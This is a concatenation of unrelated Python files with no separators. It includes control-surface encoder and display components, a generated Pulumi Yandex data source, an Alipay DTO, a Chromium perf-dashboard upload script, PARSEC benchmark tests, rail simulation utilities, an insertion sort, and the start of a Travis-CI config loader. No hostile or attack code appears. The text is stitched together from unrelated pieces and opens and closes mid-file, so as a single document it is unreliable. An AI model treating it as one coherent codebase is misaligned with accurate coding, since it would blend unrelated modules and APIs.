    pushes string representations into an attached display."""

    def __init__(self, display_label=b' ', display_seg_start=0, *a, **k):
        super(ValueDisplayComponentBase, self).__init__(*a, **k)
        self._label_data_source = DisplayDataSource(display_label)
        self._value_data_source = DisplayDataSource()
        self._graphic_data_source = DisplayDataSource()
        self._display_label = display_label
        self._display_seg_start = display_seg_start

    def get_value_string(self):
        # Subclasses provide the textual representation of the value.
        raise NotImplementedError

    def get_graphic_string(self):
        # Subclasses provide the bar-graphic representation of the value.
        raise NotImplementedError

    @listenable_property
    def value_string(self):
        return self.get_value_string()

    def set_label_display(self, display):
        self._set_display(display, self._label_data_source)

    def set_value_display(self, display):
        self._set_display(display, self._value_data_source)

    def set_graphic_display(self, display):
        self._set_display(display, self._graphic_data_source)

    def _set_display(self, display, source):
        # Clear all segments, then bind our data source to the configured
        # starting segment.
        if display:
            display.set_data_sources((None, ) * NUM_SEGMENTS)
            display.segment(self._display_seg_start).set_data_source(source)
        return

    def update(self):
        super(ValueDisplayComponentBase, self).update()
        if self.is_enabled():
            self._value_data_source.set_display_string(self.get_value_string())
            self._graphic_data_source.set_display_string(self.get_graphic_string())


class ValueComponentBase(Component):
    """
    Component to control one continuous property with a infinite
    touch-sensitive encoder.

    You can optionally give it a display and a button such that the
    value will be displayed while its pressed.
    """

    def create_display_component(self, *a, **k):
        # Subclasses build the matching display component.
        raise NotImplementedError

    def __init__(self, display_label=b' ', display_seg_start=0, encoder_touch_delay=0, *a, **k):
        super(ValueComponentBase, self).__init__(*a, **k)
        encoder = EncoderControl(touch_event_delay=encoder_touch_delay)
        # Wire the control events to the name-mangled handlers below.
        encoder.touched = ValueComponentBase.__on_encoder_touched
        encoder.released = ValueComponentBase.__on_encoder_released
        encoder.value = ValueComponentBase.__on_encoder_value
        self.add_control(b'encoder', encoder)
        self._display = self.create_display_component(display_label=display_label, display_seg_start=display_seg_start)
        # Display is shown only while the encoder is touched.
        self._display.set_enabled(False)

    @property
    def display(self):
        return self._display

    def __on_encoder_touched(self, encoder):
        self._update_display_state()

    def __on_encoder_released(self, encoder):
        self._update_display_state()

    def __on_encoder_value(self, value, encoder):
        self._on_value(value)

    def _on_value(self, value):
        # Hook for subclasses; receives the relative encoder delta.
        pass

    def _update_display_state(self):
        self._display.set_enabled(self.encoder.is_touched)


class ValueDisplayComponent(ValueDisplayComponentBase):
    """
    Display for values from standard Python properties.
    """

    def __init__(self, property_name=None, subject=None, display_format=b'%f', view_transform=None, graphic_transform=None, *a, **k):
        super(ValueDisplayComponent, self).__init__(*a, **k)
        self._subject = subject
        self._property_name = property_name
        self._display_format = display_format
        # Optional overrides shadow the default identity transforms.
        if view_transform is not None:
            self.view_transform = view_transform
        if graphic_transform is not None:
            self.graphic_transform = graphic_transform
        self.register_slot(subject, self._on_value_changed, property_name)
        self._on_value_changed()
        return

    def view_transform(self, x):
        # Default: show the raw model value.
        return x

    def graphic_transform(self, x):
        # Default: graphic follows the view value.
        return self.view_transform(x)

    def get_value_string(self):
        value = getattr(self._subject, self._property_name)
        return self._display_format % self.view_transform(value)

    def get_graphic_string(self):
        value = getattr(self._subject, self._property_name)
        graph = self.graphic_transform(value)
        return convert_value_to_graphic(graph)

    def _on_value_changed(self):
        self.update()
        self.notify_value_string()


class ValueComponent(ValueComponentBase):
    """
    Component to control one continuous property with a infinite
    touch-sensitive encoder.

    You can optionally give it a display and a button such that the
    value will be displayed while its pressed.
    """
    shift_button = ButtonControl()
    # Scale factor applied to encoder deltas; divided by 10 while shift
    # is held for fine control.
    encoder_factor = 1.0

    def create_display_component(self, *a, **k):
        return ValueDisplayComponent(parent=self, property_name=self._property_name, subject=self._subject, display_format=self._display_format, view_transform=(lambda x: self.view_transform(x)), graphic_transform=(lambda x: self.graphic_transform(x)), *a, **k)

    def __init__(self, property_name=None, subject=None, display_format=b'%f', model_transform=None, view_transform=None, graphic_transform=None, encoder_factor=None, *a, **k):
        # These must be set before super().__init__, which calls
        # create_display_component().
        self._property_name = property_name
        self._subject = subject
        self._display_format = display_format
        super(ValueComponent, self).__init__(*a, **k)
        if model_transform is not None:
            self.model_transform = model_transform
        if view_transform is not None:
            self.view_transform = view_transform
        if graphic_transform is not None:
            self.graphic_transform = graphic_transform
        if encoder_factor is not None:
            self.encoder_factor = encoder_factor
        self._original_encoder_factor = self.encoder_factor
        return

    def model_transform(self, x):
        """
        Tranform a value 'x' from the view domain to the domain as
        stored in the subject.
        """
        return x

    def view_transform(self, x):
        """
        Transform a value 'x' from the model domain to the view domain
        as represented to the user.
        """
        return x

    def graphic_transform(self, x):
        """
        Transform a value 'x' from the model domain to [0..1] range to
        be used in the slider-representation of the value.
        """
        return self.view_transform(x) / self.encoder_factor

    @shift_button.pressed
    def shift_button(self, button):
        # Fine-adjust mode while shift is held.
        self.encoder_factor = self._original_encoder_factor / 10.0

    @shift_button.released
    def shift_button(self, button):
        self.encoder_factor = self._original_encoder_factor

    def _on_value(self, value):
        super(ValueComponent, self)._on_value(value)
        # Apply the scaled relative delta in view space, then write the
        # model-space result back to the subject.
        value = self.view_transform(getattr(self._subject, self._property_name)) + value * self.encoder_factor
        setattr(self._subject, self._property_name, self.model_transform(value))


class ParameterValueDisplayComponent(ValueDisplayComponentBase):
    """
    Display for values from device parameters.
    """

    def __init__(self, device_parameter=None, *a, **k):
        super(ParameterValueDisplayComponent, self).__init__(*a, **k)
        self._on_value_changed.subject = device_parameter
        self._on_value_changed()

    def get_value_string(self):
        return str(self._on_value_changed.subject)

    def get_graphic_string(self):
        return convert_parameter_value_to_graphic(self._on_value_changed.subject)

    @listens(b'value')
    def _on_value_changed(self):
        self.update()
        self.notify_value_string()


class ParameterValueComponent(ValueComponentBase):
    """
    Component to control a device parameter with a infinite
    touch-sensitive encoder.

    You can optionally give it a display and a button such that the
    value will be displayed while its pressed.
    """

    def create_display_component(self, *a, **k):
        return ParameterValueDisplayComponent(device_parameter=self._parameter_slot.parameter, *a, **k)

    def __init__(self, device_parameter=None, *a, **k):
        # Slot must exist before super().__init__ triggers
        # create_display_component().
        self._parameter_slot = ParameterSlot(device_parameter)
        super(ParameterValueComponent, self).__init__(*a, **k)
        self.register_disconnectable(self._parameter_slot)

    def set_encoder(self, encoder):
        self.encoder.set_control_element(encoder)
        self._parameter_slot.control = encoder
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***

import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities

__all__ = [
    'GetComputeDiskPlacementGroupResult',
    'AwaitableGetComputeDiskPlacementGroupResult',
    'get_compute_disk_placement_group',
    'get_compute_disk_placement_group_output',
]

@pulumi.output_type
class GetComputeDiskPlacementGroupResult:
    """
    A collection of values returned by getComputeDiskPlacementGroup.
    """
    def __init__(__self__, created_at=None, description=None, folder_id=None, group_id=None, id=None, labels=None, name=None, status=None, zone=None):
        # Each argument is type-checked before being stored on the output
        # type via pulumi.set (generated validation pattern).
        if created_at and not isinstance(created_at, str):
            raise TypeError("Expected argument 'created_at' to be a str")
        pulumi.set(__self__, "created_at", created_at)
        if description and not isinstance(description, str):
            raise TypeError("Expected argument 'description' to be a str")
        pulumi.set(__self__, "description", description)
        if folder_id and not isinstance(folder_id, str):
            raise TypeError("Expected argument 'folder_id' to be a str")
        pulumi.set(__self__, "folder_id", folder_id)
        if group_id and not isinstance(group_id, str):
            raise TypeError("Expected argument 'group_id' to be a str")
        pulumi.set(__self__, "group_id", group_id)
        if id and not isinstance(id, str):
            raise TypeError("Expected argument 'id' to be a str")
        pulumi.set(__self__, "id", id)
        if labels and not isinstance(labels, dict):
            raise TypeError("Expected argument 'labels' to be a dict")
        pulumi.set(__self__, "labels", labels)
        if name and not isinstance(name, str):
            raise TypeError("Expected argument 'name' to be a str")
        pulumi.set(__self__, "name", name)
        if status and not isinstance(status, str):
            raise TypeError("Expected argument 'status' to be a str")
        pulumi.set(__self__, "status", status)
        if zone and not isinstance(zone, str):
            raise TypeError("Expected argument 'zone' to be a str")
        pulumi.set(__self__, "zone", zone)

    @property
    @pulumi.getter(name="createdAt")
    def created_at(self) -> str:
        """
        The creation timestamp of the Disk Placement Group.
        """
        return pulumi.get(self, "created_at")

    @property
    @pulumi.getter
    def description(self) -> Optional[str]:
        """
        Description of the Disk Placement Group.
        """
        return pulumi.get(self, "description")

    @property
    @pulumi.getter(name="folderId")
    def folder_id(self) -> str:
        return pulumi.get(self, "folder_id")

    @property
    @pulumi.getter(name="groupId")
    def group_id(self) -> str:
        return pulumi.get(self, "group_id")

    @property
    @pulumi.getter
    def id(self) -> str:
        """
        The provider-assigned unique ID for this managed resource.
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def labels(self) -> Optional[Mapping[str, str]]:
        """
        A set of key/value label pairs assigned to the Disk Placement Group.
        """
        return pulumi.get(self, "labels")

    @property
    @pulumi.getter
    def name(self) -> Optional[str]:
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def status(self) -> str:
        """
        Status of the Disk Placement Group.
        """
        return pulumi.get(self, "status")

    @property
    @pulumi.getter
    def zone(self) -> Optional[str]:
        """
        ID of the zone where the Disk Placement Group resides.
        """
        return pulumi.get(self, "zone")


class AwaitableGetComputeDiskPlacementGroupResult(GetComputeDiskPlacementGroupResult):
    # Makes the (already resolved) result awaitable: __await__ is a
    # generator that yields nothing and returns a plain result copy.
    # pylint: disable=using-constant-test
    def __await__(self):
        if False:
            yield self
        return GetComputeDiskPlacementGroupResult(
            created_at=self.created_at,
            description=self.description,
            folder_id=self.folder_id,
            group_id=self.group_id,
            id=self.id,
            labels=self.labels,
            name=self.name,
            status=self.status,
            zone=self.zone)


def get_compute_disk_placement_group(description: Optional[str] = None,
                                     folder_id: Optional[str] = None,
                                     group_id: Optional[str] = None,
                                     labels: Optional[Mapping[str, str]] = None,
                                     name: Optional[str] = None,
                                     zone: Optional[str] = None,
                                     opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetComputeDiskPlacementGroupResult:
    """
    Get information about a Yandex Compute Disk Placement group. For more information, see
    [the official documentation](https://cloud.yandex.com/docs/compute/concepts/disk#nr-disks).

    ## Example Usage

    ```python
    import pulumi
    import pulumi_yandex as yandex

    my_group = yandex.get_compute_disk_placement_group(group_id="some_group_id")
    pulumi.export("placementGroupName", my_group.name)
    ```


    :param str description: Description of the Disk Placement Group.
    :param str folder_id: Folder that the resource belongs to. If value is omitted, the default provider folder is used.
    :param str group_id: The ID of a specific group.
    :param Mapping[str, str] labels: A set of key/value label pairs assigned to the Disk Placement Group.
    :param str name: Name of the group.
    :param str zone: ID of the zone where the Disk Placement Group resides.
    """
    __args__ = dict()
    __args__['description'] = description
    __args__['folderId'] = folder_id
    __args__['groupId'] = group_id
    __args__['labels'] = labels
    __args__['name'] = name
    __args__['zone'] = zone
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        opts.version = _utilities.get_version()
    # Synchronous invoke against the provider; .value blocks until resolved.
    __ret__ = pulumi.runtime.invoke('yandex:index/getComputeDiskPlacementGroup:getComputeDiskPlacementGroup', __args__, opts=opts, typ=GetComputeDiskPlacementGroupResult).value

    return AwaitableGetComputeDiskPlacementGroupResult(
        created_at=__ret__.created_at,
        description=__ret__.description,
        folder_id=__ret__.folder_id,
        group_id=__ret__.group_id,
        id=__ret__.id,
        labels=__ret__.labels,
        name=__ret__.name,
        status=__ret__.status,
        zone=__ret__.zone)


@_utilities.lift_output_func(get_compute_disk_placement_group)
def get_compute_disk_placement_group_output(description: Optional[pulumi.Input[Optional[str]]] = None,
                                            folder_id: Optional[pulumi.Input[Optional[str]]] = None,
                                            group_id: Optional[pulumi.Input[Optional[str]]] = None,
                                            labels: Optional[pulumi.Input[Optional[Mapping[str, str]]]] = None,
                                            name: Optional[pulumi.Input[Optional[str]]] = None,
                                            zone: Optional[pulumi.Input[Optional[str]]] = None,
                                            opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetComputeDiskPlacementGroupResult]:
    """
    Get information about a Yandex Compute Disk Placement group. For more information, see
    [the official documentation](https://cloud.yandex.com/docs/compute/concepts/disk#nr-disks).

    ## Example Usage

    ```python
    import pulumi
    import pulumi_yandex as yandex

    my_group = yandex.get_compute_disk_placement_group(group_id="some_group_id")
    pulumi.export("placementGroupName", my_group.name)
    ```


    :param str description: Description of the Disk Placement Group.
    :param str folder_id: Folder that the resource belongs to. If value is omitted, the default provider folder is used.
    :param str group_id: The ID of a specific group.
    :param Mapping[str, str] labels: A set of key/value label pairs assigned to the Disk Placement Group.
    :param str name: Name of the group.
    :param str zone: ID of the zone where the Disk Placement Group resides.
    """
    # Body supplied by the lift_output_func decorator.
    ...
#!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.constant.ParamConstants import * class SignApproveOpenApiDTO(object): def __init__(self): self._process_ids = None self._process_type = None @property def process_ids(self): return self._process_ids @process_ids.setter def process_ids(self, value): if isinstance(value, list): self._process_ids = list() for i in value: self._process_ids.append(i) @property def process_type(self): return self._process_type @process_type.setter def process_type(self, value): self._process_type = value def to_alipay_dict(self): params = dict() if self.process_ids: if isinstance(self.process_ids, list): for i in range(0, len(self.process_ids)): element = self.process_ids[i] if hasattr(element, 'to_alipay_dict'): self.process_ids[i] = element.to_alipay_dict() if hasattr(self.process_ids, 'to_alipay_dict'): params['process_ids'] = self.process_ids.to_alipay_dict() else: params['process_ids'] = self.process_ids if self.process_type: if hasattr(self.process_type, 'to_alipay_dict'): params['process_type'] = self.process_type.to_alipay_dict() else: params['process_type'] = self.process_type return params @staticmethod def from_alipay_dict(d): if not d: return None o = SignApproveOpenApiDTO() if 'process_ids' in d: o.process_ids = d['process_ids'] if 'process_type' in d: o.process_type = d['process_type'] return o
#!/usr/bin/env vpython
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

# This file was copy-pasted over from:
# //build/scripts/slave/upload_perf_dashboard_results.py
# with sections copied from:
# //build/scripts/slave/slave_utils.py

import json
import logging
import optparse
import os
import re
import shutil
import sys
import tempfile
import time

import six.moves.urllib.parse  # pylint: disable=import-error

from core import results_dashboard

logging.basicConfig(
    level=logging.INFO,
    format='(%(levelname)s) %(asctime)s pid=%(process)d'
    ' %(module)s.%(funcName)s:%(lineno)d %(message)s')

# Template for the dashboard link written next to uploaded results.
RESULTS_LINK_PATH = '/report?masters=%s&bots=%s&tests=%s&rev=%s'


def _CommitPositionNumber(commit_pos):
  """Extracts the number part of a commit position.

  This is used to extract the number from got_revision_cp; This will be used
  as the value of "rev" in the data passed to results_dashboard.SendResults.

  Raises AttributeError if commit_pos does not contain a '{#N}' marker.
  """
  # In case r_chromium is set to None, this logging will help see which
  # commit_pos value caused it.
  logging.info("got_revision_cp flag has value: %s.", commit_pos)
  return int(re.search(r'{#(\d+)}', commit_pos).group(1))


def _GetDashboardJson(options):
  """Converts the results file into legacy (pre-histogram) dashboard JSON."""
  main_revision = _CommitPositionNumber(options.got_revision_cp)
  revisions = _GetPerfDashboardRevisionsWithProperties(
      options.got_webrtc_revision, options.got_v8_revision,
      options.git_revision, main_revision)
  reference_build = 'reference' in options.name
  stripped_test_name = options.name.replace('.reference', '')
  results = {}
  logging.info('Opening results file %s' % options.results_file)
  with open(options.results_file) as f:
    results = json.load(f)
  dashboard_json = {}
  if 'charts' not in results:
    # These are legacy results.
    # pylint: disable=redefined-variable-type
    dashboard_json = results_dashboard.MakeListOfPoints(
        results, options.configuration_name, stripped_test_name,
        options.project, options.buildbucket, options.buildername,
        options.buildnumber, {}, options.perf_dashboard_machine_group,
        revisions_dict=revisions)
  else:
    dashboard_json = results_dashboard.MakeDashboardJsonV1(
        results, revisions, stripped_test_name, options.configuration_name,
        options.project, options.buildbucket, options.buildername,
        options.buildnumber, {}, reference_build,
        perf_dashboard_machine_group=options.perf_dashboard_machine_group)
  return dashboard_json


def _GetDashboardHistogramData(options):
  """Converts a HistogramSet results file into a list of upload batches."""
  revisions = {}
  if options.got_revision_cp:
    revisions['--chromium_commit_positions'] = \
        _CommitPositionNumber(options.got_revision_cp)
  if options.git_revision:
    revisions['--chromium_revisions'] = options.git_revision
  if options.got_webrtc_revision:
    revisions['--webrtc_revisions'] = options.got_webrtc_revision
  if options.got_v8_revision:
    revisions['--v8_revisions'] = options.got_v8_revision
  if options.got_angle_revision:
    revisions['--angle_revisions'] = options.got_angle_revision

  is_reference_build = 'reference' in options.name
  stripped_test_name = options.name.replace('.reference', '')

  # Upper bound on the size of a single upload batch.
  max_bytes = 1 << 20

  output_dir = tempfile.mkdtemp()
  try:
    begin_time = time.time()
    results_dashboard.MakeHistogramSetWithDiagnostics(
        histograms_file=options.results_file,
        test_name=stripped_test_name,
        bot=options.configuration_name,
        buildername=options.buildername,
        buildnumber=options.buildnumber,
        project=options.project,
        buildbucket=options.buildbucket,
        revisions_dict=revisions,
        is_reference_build=is_reference_build,
        perf_dashboard_machine_group=options.perf_dashboard_machine_group,
        output_dir=output_dir,
        max_bytes=max_bytes)
    end_time = time.time()
    logging.info('Duration of adding diagnostics for %s: %d seconds' %
                 (stripped_test_name, end_time - begin_time))

    # Read all batch files from output_dir.
    dashboard_jsons = []
    for basename in os.listdir(output_dir):
      with open(os.path.join(output_dir, basename)) as f:
        dashboard_jsons.append(json.load(f))

    return dashboard_jsons
  finally:
    # Always clean up the scratch directory, even if conversion failed.
    shutil.rmtree(output_dir)


def _CreateParser():
  """Builds the option parser for this script."""
  parser = optparse.OptionParser()
  parser.add_option('--name')
  parser.add_option('--results-file')
  parser.add_option('--output-json-file')
  parser.add_option('--got-revision-cp')
  parser.add_option('--configuration-name')
  parser.add_option('--results-url')
  parser.add_option('--perf-dashboard-machine-group')
  parser.add_option('--project')
  parser.add_option('--buildbucket')
  parser.add_option('--buildername')
  parser.add_option('--buildnumber')
  parser.add_option('--got-webrtc-revision')
  parser.add_option('--got-v8-revision')
  parser.add_option('--got-angle-revision')
  parser.add_option('--git-revision')
  parser.add_option('--output-json-dashboard-url')
  parser.add_option('--send-as-histograms', action='store_true')
  return parser


def main(args):
  """Parses the command line, converts results and uploads them.

  Returns 0 on success and 1 if any upload batch fails.
  """
  parser = _CreateParser()
  options, extra_args = parser.parse_args(args)

  # Validate options.
  if extra_args:
    parser.error('Unexpected command line arguments')
  if not options.configuration_name or not options.results_url:
    parser.error('configuration_name and results_url are required.')

  if not options.perf_dashboard_machine_group:
    logging.error('Invalid perf dashboard machine group')
    return 1

  if not options.send_as_histograms:
    dashboard_json = _GetDashboardJson(options)
    dashboard_jsons = []
    if dashboard_json:
      dashboard_jsons.append(dashboard_json)
  else:
    dashboard_jsons = _GetDashboardHistogramData(options)

  if options.output_json_file:
    # The HistogramSet might have been batched if it would be too large to
    # upload together. It's safe to concatenate the batches in order to write
    # output_json_file.
    # TODO(crbug.com/918208): Use a script in catapult to merge
    # dashboard_jsons.
    dashboard_json = sum(dashboard_jsons, [])
    # Fix: --output-json-file is a path string (optparse stores strings), so
    # the file must be opened before json.dump() can write to it; the
    # original passed the path itself, which has no .write() method.
    with open(options.output_json_file, 'w') as output_file:
      json.dump(dashboard_json, output_file, indent=4,
                separators=(',', ': '))

  if dashboard_jsons:
    if options.output_json_dashboard_url:
      # Dump dashboard url to file.
      dashboard_url = GetDashboardUrl(options.name,
                                      options.configuration_name,
                                      options.results_url,
                                      options.got_revision_cp,
                                      options.perf_dashboard_machine_group)
      with open(options.output_json_dashboard_url, 'w') as f:
        json.dump(dashboard_url if dashboard_url else '', f)
    for batch in dashboard_jsons:
      if not results_dashboard.SendResults(
          batch,
          options.name,
          options.results_url,
          send_as_histograms=options.send_as_histograms):
        return 1
  else:
    # The upload didn't fail since there was no data to upload.
    logging.warning('No perf dashboard JSON was produced.')
  return 0


def GetDashboardUrl(name, configuration_name, results_url, got_revision_cp,
                    perf_dashboard_machine_group):
  """Returns a link to the uploaded results on the dashboard."""
  name = name.replace('.reference', '')
  dashboard_url = results_url + RESULTS_LINK_PATH % (
      six.moves.urllib.parse.quote(perf_dashboard_machine_group),
      six.moves.urllib.parse.quote(configuration_name),
      six.moves.urllib.parse.quote(name),
      _CommitPositionNumber(got_revision_cp))
  return dashboard_url


def _GetPerfDashboardRevisionsWithProperties(got_webrtc_revision,
                                             got_v8_revision, git_revision,
                                             main_revision, point_id=None):
  """Fills in the same revisions fields that process_log_utils does."""
  versions = {}
  versions['rev'] = main_revision
  versions['webrtc_git'] = got_webrtc_revision
  versions['v8_rev'] = got_v8_revision
  versions['git_revision'] = git_revision
  versions['point_id'] = point_id
  # There are a lot of "bad" revisions to check for, so clean them all up
  # here.  Fix: iterate over a snapshot of the keys -- deleting from a dict
  # while iterating its live keys() view raises RuntimeError on Python 3.
  for key in list(versions):
    if not versions[key] or versions[key] == 'undefined':
      del versions[key]
  return versions


# Fix: the entry-point guard was originally placed *before* GetDashboardUrl
# and _GetPerfDashboardRevisionsWithProperties were defined, so running the
# script raised NameError as soon as main() reached GetDashboardUrl.  It must
# come after all definitions.
if __name__ == '__main__':
  sys.exit(main(sys.argv[1:]))
# ATTENTION: the tests are supposed to be run inside a container!
# all dependencies have to be installed before running the tests by `./entrypoint install -n benchmark_name`
from .abstract_test import BuildAndRun, INPUT_PATH
from .abstract_acceptance_test import Acceptance

import sys
import logging
import unittest


class TestParsec(unittest.TestCase, BuildAndRun):
    """Build-and-run smoke tests for the PARSEC benchmark suite.

    The actual build/run machinery comes from BuildAndRun; this class only
    declares which benchmarks to exercise and the single-threaded test
    command line for each.
    """

    # tested applications
    benchmarks = {
        # benchmark name: (path, test input)
        'blackscholes': ('src/parsec/blackscholes',
                         '1 %s/parsec/blackscholes/in_4.txt prices.txt' % INPUT_PATH),
        'bodytrack': ('src/parsec/bodytrack',
                      '%s/parsec/bodytrack/sequenceB_1 4 1 4000 5 0 1' % INPUT_PATH),
        'canneal': ('src/parsec/canneal',
                    '1 15000 2000 %s/parsec/canneal/10.nets 6000' % INPUT_PATH),
        'dedup': ('src/parsec/dedup',
                  '-c -p -t 1 -i %s/parsec/dedup/test.dat -o output.dat.ddp' % INPUT_PATH),
        'facesim': ('src/parsec/facesim',
                    '-timing -threads 1 -data_dir %s/parsec/facesim/test/' % INPUT_PATH),
        'ferret': ('src/parsec/ferret',
                   '{0}/parsec/ferret/test/corel lsh {0}/parsec/ferret/test/queries 5 5 1 output.txt'.format(INPUT_PATH)),
        'fluidanimate': ('src/parsec/fluidanimate',
                         '1 500 %s/parsec/fluidanimate/in_5K.fluid out.fluid' % INPUT_PATH),
        'raytrace': ('src/parsec/raytrace',
                     '%s/parsec/raytrace/thai_statue.obj -automove -nthreads 1 -frames 20 -res 360 480' % INPUT_PATH),
        'streamcluster': ('src/parsec/streamcluster',
                          '10 20 128 1000 200 5000 none output.txt 1'),
        'swaptions': ('src/parsec/swaptions',
                      '-ns 128 -sm 100 -nt 1'),
        'vips': ('src/parsec/vips',
                 'im_benchmark %s/parsec/vips/barbados_256x288.v output.v' % INPUT_PATH),
        'x264': ('src/parsec/x264',
                 '--quiet --qp 20 --partitions b8x8,i4x4 --ref 5 --direct auto --b-pyramid --weightb --mixed-refs --no-fast-pskip --me umh --subme 7 --analyse b8x8,i4x4 --threads 1 -o eledream.264 %s/parsec/x264/eledream_32x18_1.y4m' % INPUT_PATH),
    }


class TestParsecAcceptance(TestParsec, Acceptance):
    """Same benchmarks, run through the Acceptance-test mixin."""
    pass


if __name__ == '__main__':
    logging.basicConfig(stream=sys.stderr)
    logging.getLogger("Test").setLevel(logging.DEBUG)
    # Fix: the guard originally only configured logging and returned without
    # running anything; unittest.main() is required to actually discover and
    # execute the test cases defined above.
    unittest.main()
# -*- coding: utf-8 -*-
"""
Created on Sat Apr  2 19:54:03 2016

@author: nhuynh
"""
# Post-processing utilities for rail-station simulation output: flow counts
# and per-profile boarding counts.  Depends on the project modules below
# (utilities, railNetv2, mmResultsRef, mmRef) for file parsing, station
# lookups and column/vocabulary enums.
import csv;
import utilities;
import railNetv2;
import mmResultsRef;
import mmRef;


def readInFlowCounts(filename):
    """ reads in the flow counts from simulation output files of a station.
    ignores the second row (don't know what it is and seems irrelevant).
    converts the first column, which is in hh:mm:ss format, to number of
    seconds from midnight.
    Returns a dictionary where key is the header of each column and value
    is a 2-column array, which comprises number of seconds from midnight (1st
    column) and flow counts (2nd column) corresponding to the header.
    Example:
    #flowCounts = readInFlowCounts('../newStation4/DefaultRun/FlowCounts.csv');
    """
    # Slurp the whole CSV into memory first; rows 0 (header) and 1 are
    # skipped by every loop below.
    rawFlowCounts = [];
    with open(filename) as csvfile:
        reader = csv.reader(csvfile, delimiter=',');
        for row in reader:
            rawFlowCounts.append(row);
    # Pre-convert the hh:mm:ss timestamps (column 0) once, so each data
    # column can reuse them.
    timeStamps = [];
    for iRow in range(len(rawFlowCounts)):
        if iRow==0 or iRow==1:
            continue;
        timeStamps.append(utilities.convertTimeFormatToSecs(rawFlowCounts[iRow][0]));
    flowCounts = {};
    nColumns = len(rawFlowCounts[0]);
    for iCol in range(nColumns):
        if iCol == 0:
            continue;
        key = rawFlowCounts[0][iCol];
        counts = [];
        for iRow in range(len(rawFlowCounts)):
            if iRow==0 or iRow==1:
                continue;
            # iRow-2 aligns with timeStamps, which skipped the two header rows.
            counts.append([timeStamps[iRow-2],int(rawFlowCounts[iRow][iCol])]);
        flowCounts[key] = counts;
    return flowCounts;


def getBoardingPaxAtPrevStop(prevStopName,prevStopArrTime):
    """ reads in JourneyTimes and extracts the number of passengers in each
    profile boarding a train at a given stop at the given arrival time of the
    train.

    Returns [countSlim, countFat, countDefault]: one tally per passenger
    profile (slimFastActiv, fatSlowLazy, DefaultProfile).
    """
    #prevStopName = prevStopDetails[0];
    #prevStopArrTime = prevStopDetails[1];
    prevStnName = railNetv2.StationPlatforms.getStationNameByStopName(prevStopName);
    journeyTimeFile = mmResultsRef.makeResultsPath(prevStnName) + 'JourneyTimes.csv';
    rawJourneyTimes = utilities.readInCSVFile(journeyTimeFile);
    countSlim = 0;
    countFat = 0;
    countDefault = 0;
    # Profile names as they appear (as substrings) in the profile column.
    slimFastActiv = mmRef.Profiles.slimFastActiv.name;
    fatSlowLazy = mmRef.Profiles.fatSlowLazy.name;
    default = mmRef.Profiles.DefaultProfile.name;
    profileCol = mmResultsRef.JourneyTimesCols.profile.value;
    for row in rawJourneyTimes:
        if isBoarding(row,prevStopName,prevStopArrTime):
            #print(row[mmResultsRef.JourneyTimesCols.agentID.value]);
            # NOTE(review): checked in order default -> slim -> fat; a row
            # whose profile string matched more than one name would be
            # counted under the first match -- confirm names are disjoint.
            if default in row[profileCol]:
                countDefault = countDefault + 1;
            elif slimFastActiv in row[profileCol]:
                countSlim = countSlim + 1;
            elif fatSlowLazy in row[profileCol]:
                countFat = countFat + 1;
            else:
                pass;
    return [countSlim, countFat, countDefault];
    #print(rawJourneyTimes[3]);


def isBoarding(row,prevStopName,prevStopArrTime):
    """ returns True if a JourneyTimes row represents a passenger boarding at
    prevStopName within the counting window starting at prevStopArrTime. """
    outLocationCol = mmResultsRef.JourneyTimesCols.out_location.value;
    outTimeCol = mmResultsRef.JourneyTimesCols.out_time.value;
    wordSeats = mmResultsRef.JourneyTimesVocab.seats.value;
    wordCar = mmResultsRef.JourneyTimesVocab.car.value;
    wordTraindoor = mmResultsRef.JourneyTimesVocab.traindoor.value;
    questionMarks = mmResultsRef.JourneyTimesVocab.questionMarks.value;
    # Window length after train arrival during which a passenger counts.
    totalCountTime = utilities.convertTimeFormatToSecs(mmRef.ConstTimeValues.backToSeatTimeOffset.value);
    # counts both passengers that sucessfully get to the seats and those who
    # were supposed to get off the train but failed (i.e. noted by question
    # marks in their out location)
    if (wordSeats in row[outLocationCol] and prevStopName in row[outLocationCol]) or \
       (wordCar in row[outLocationCol] and prevStopName in row[outLocationCol]) or\
       (wordTraindoor in row[outLocationCol] and prevStopName in row[outLocationCol]) or \
       (questionMarks in row[outLocationCol]):
        outtime = utilities.convertTimeFormatToSecs(row[outTimeCol]);
        if outtime>=prevStopArrTime and outtime<=prevStopArrTime+totalCountTime:
            return True;
    return False;
#!/usr/bin/env python3


class Insertion_Sort:
    """Interactive insertion sort over a user-entered list of integers.

    Fixes over the original, which could not run at all:
    - __init__ referenced an undefined name ``t`` and indexed ``arr[6]``;
    - the methods were defined without ``self`` and iterated ``for i in n``
      over an int;
    - the inner sort loop never decremented ``j``, so it either skipped or
      looped forever;
    - the module-level code aliased the *class* as ``self`` and ran on
      import.  It is now behind a ``__main__`` guard.
    """

    def __init__(self, arr=None):
        # Optional seed data; user_input() can (re)populate interactively.
        self.arr = list(arr) if arr is not None else []
        self.n = len(self.arr)

    def user_input(self):
        """Read the element count and then the elements from stdin."""
        self.n = int(input("kindly enter the number of elements to be entered into the database"))
        self.arr = []
        for _ in range(self.n):
            self.arr.append(int(input(f"kindly enter {self.n} elements")))

    def sort(self):
        """In-place insertion sort of self.arr into ascending order."""
        for i in range(1, self.n):
            j = i
            # Sift arr[i] leftwards until it is no smaller than its neighbor.
            while j > 0 and self.arr[j] < self.arr[j - 1]:
                self.arr[j], self.arr[j - 1] = self.arr[j - 1], self.arr[j]
                j -= 1

    def display(self):
        """Print the (sorted) elements, one per line."""
        print("sorted array in ascending order ")
        for value in self.arr:
            print(value)


if __name__ == '__main__':
    sorter = Insertion_Sort()
    sorter.user_input()
    sorter.sort()
    sorter.display()
import ConfigParser
import requests
import json
import os

# Load all mutable-like information from configuration files.
# Module-level setup: reads ~/.pytravisrc, resolves the Travis-CI API
# endpoints and, if a GitHub token is configured, exchanges it for a
# Travis-CI authorization token.  Raises on any misconfiguration so the
